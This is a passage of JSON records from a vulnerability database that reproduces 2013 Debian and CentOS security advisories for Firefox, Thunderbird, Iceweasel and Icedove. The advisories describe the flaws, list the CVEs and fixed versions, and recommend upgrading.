"2013-06-26T00:00:00", "id": "USN-1890-1", "href": "https://ubuntu.com/security/notices/USN-1890-1", "title": "Firefox vulnerabilities", "type": "ubuntu", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2019-05-30T02:21:57", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2720-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nJuly 06, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : icedove\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2013-1682 CVE-2013-1684 CVE-2013-1685 CVE-2013-1686 \n CVE-2013-1687 CVE-2013-1690 CVE-2013-1692 CVE-2013-1693 \n CVE-2013-1694 CVE-2013-1697\n\nMultiple security issues have been found in Icedove, Debian's version\nof the Mozilla Thunderbird mail and news client. Multiple memory safety \nerrors, use-after-free vulnerabilities, missing permission checks, incorrect \nmemory handling and other implementaton errors may lead to the execution\nof arbitrary code, privilege escalation, information disclosure or\ncross-site request forgery.\n\nAs already announced for Iceweasel: We're changing the approach for\nsecurity updates for Icedove in stable-security: Instead of\nbackporting security fixes, we now provide releases based on the \nExtended Support Release branch. As such, this update introduces\npackages based on Thunderbird 17 and at some point in the future we \nwill switch to the next ESR branch once ESR 17 has reached it's end \nof life.\n\nSome Icedove extensions currently packaged in the Debian archive are \nnot compatible with the new browser engine. Up-to-date and compatible \nversions can be retrieved from http://addons.mozilla.org as a short \nterm solution.\n\nAn updated and compatible version of enigmail is included with this \nupdate.\n\nThe icedove version in the oldstable distribution (squeeze) is no\nlonger supported with full security updates. However, it should be\nnoted that almost all security issues in Icedove stem from the\nincluded browser engine. These security problems only affect Icedove\nif scripting and HTML mails are enabled. If there are security issues\nspecific to Icedove (e.g. a hypothetical buffer overflow in the IMAP\nimplementation) we'll make an effort to backport such fixes to oldstable.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 17.0.7-1~deb7u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 17.0.7-1.\n\nWe recommend that you upgrade your icedove packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n\n", "edition": 2, "modified": "2013-07-06T15:37:40", "published": "2013-07-06T15:37:40", "id": "DEBIAN:DSA-2720-1:1CEA2", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2013/msg00129.html", "title": "[SECURITY] [DSA 2720-1] icedove security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T02:21:22", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-2716-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nJune 26, 2013 http://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : iceweasel\nVulnerability : several\nProblem type : remote\nDebian-specific: no\nCVE ID : CVE-2013-1682 CVE-2013-1684 CVE-2013-1685 CVE-2013-1686 \n CVE-2013-1687 CVE-2013-1690 CVE-2013-1692 CVE-2013-1693 \n CVE-2013-1694 CVE-2013-1697\n\nMultiple security issues have been found in Iceweasel, Debian's version\nof the Mozilla Firefox web browser: Multiple memory safety errors,\nuse-after-free vulnerabilities, missing permission checks, incorrect \nmemory handling and other implementaton errors may lead to the execution\nof arbitrary code, privilege escalation, information disclosure or\ncross-site request forgery.\n\nThe iceweasel version in the oldstable distribution (squeeze) is no\nlonger supported with security updates.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 17.0.7esr-1~deb7u1.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 17.0.7esr-1.\n\nWe recommend that you upgrade your iceweasel packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: http://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n\n\n", "edition": 3, "modified": "2013-06-26T14:01:13", "published": "2013-06-26T14:01:13", "id": "DEBIAN:DSA-2716-1:03728", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2013/msg00125.html", "title": "[SECURITY] [DSA 2716-1] iceweasel security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "centos": [{"lastseen": "2020-07-17T03:33:02", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "**CentOS Errata and Security Advisory** CESA-2013:0982\n\n\nMozilla Thunderbird is a standalone mail and newsgroup client.\n\nSeveral flaws were found in the processing of malformed content. Malicious\ncontent could cause Thunderbird to crash or, potentially, execute arbitrary\ncode with the privileges of the user running Thunderbird. (CVE-2013-1682,\nCVE-2013-1684, CVE-2013-1685, CVE-2013-1686, CVE-2013-1687, CVE-2013-1690)\n\nIt was found that Thunderbird allowed data to be sent in the body of\nXMLHttpRequest (XHR) HEAD requests. In some cases this could allow\nattackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n(CVE-2013-1692)\n\nTiming differences in the way Thunderbird processed SVG image files could\nallow an attacker to read data across domains, potentially leading to\ninformation disclosure. (CVE-2013-1693)\n\nTwo flaws were found in the way Thunderbird implemented some of its\ninternal structures (called wrappers). An attacker could use these flaws to\nbypass some restrictions placed on them. This could lead to unexpected\nbehavior or a potentially exploitable crash. (CVE-2013-1694, CVE-2013-1697)\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Gary Kwong, Jesse Ruderman, Andrew McCreight,\nAbhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos, Paul Stone, Boris\nZbarsky, and moz_bug_r_a4 as the original reporters of these issues.\n\nNote: All of the above issues cannot be exploited by a specially-crafted\nHTML mail message as JavaScript is disabled by default for mail messages.\nThey could be exploited another way in Thunderbird, for example, when\nviewing the full remote content of an RSS feed.\n\nAll Thunderbird users should upgrade to this updated package, which\ncontains Thunderbird version 17.0.7 ESR, which corrects these issues. After\ninstalling the update, Thunderbird must be restarted for the changes to\ntake effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-June/031845.html\nhttp://lists.centos.org/pipermail/centos-announce/2013-June/031855.html\n\n**Affected packages:**\nthunderbird\n\n**Upstream details at:**\n\nhttps://rhn.redhat.com/errata/RHSA-2013-0982.html", "edition": 5, "modified": "2013-06-26T02:38:03", "published": "2013-06-26T02:19:42", "href": "http://lists.centos.org/pipermail/centos-announce/2013-June/031845.html", "id": "CESA-2013:0982", "title": "thunderbird security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-20T18:26:42", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "description": "**CentOS Errata and Security Advisory** CESA-2013:0981\n\n\nMozilla Firefox is an open source web browser. XULRunner provides the XUL\nRuntime environment for Mozilla Firefox.\n\nSeveral flaws were found in the processing of malformed web content. A web\npage containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user running\nFirefox. (CVE-2013-1682, CVE-2013-1684, CVE-2013-1685, CVE-2013-1686,\nCVE-2013-1687, CVE-2013-1690)\n\nIt was found that Firefox allowed data to be sent in the body of\nXMLHttpRequest (XHR) HEAD requests. In some cases this could allow\nattackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n(CVE-2013-1692)\n\nTiming differences in the way Firefox processed SVG image files could\nallow an attacker to read data across domains, potentially leading to\ninformation disclosure. (CVE-2013-1693)\n\nTwo flaws were found in the way Firefox implemented some of its internal\nstructures (called wrappers). An attacker could use these flaws to bypass\nsome restrictions placed on them. This could lead to unexpected behavior or\na potentially exploitable crash. (CVE-2013-1694, CVE-2013-1697)\n\nRed Hat would like to thank the Mozilla project for reporting these issues.\nUpstream acknowledges Gary Kwong, Jesse Ruderman, Andrew McCreight,\nAbhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos, Paul Stone, Boris\nZbarsky, and moz_bug_r_a4 as the original reporters of these issues.\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 17.0.7 ESR. You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nAll Firefox users should upgrade to these updated packages, which contain\nFirefox version 17.0.7 ESR, which corrects these issues. After installing\nthe update, Firefox must be restarted for the changes to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2013-June/031846.html\nhttp://lists.centos.org/pipermail/centos-announce/2013-June/031847.html\nhttp://lists.centos.org/pipermail/centos-announce/2013-June/031854.html\nhttp://lists.centos.org/pipermail/centos-announce/2013-June/031856.html\n\n**Affected packages:**\nfirefox\nxulrunner\nxulrunner-devel\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-0981.html", "edition": 3, "modified": "2013-06-26T02:40:20", "published": "2013-06-26T02:19:59", "href": "http://lists.centos.org/pipermail/centos-announce/2013-June/031846.html", "id": "CESA-2013:0981", "title": "firefox, xulrunner security update", "type": "centos", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
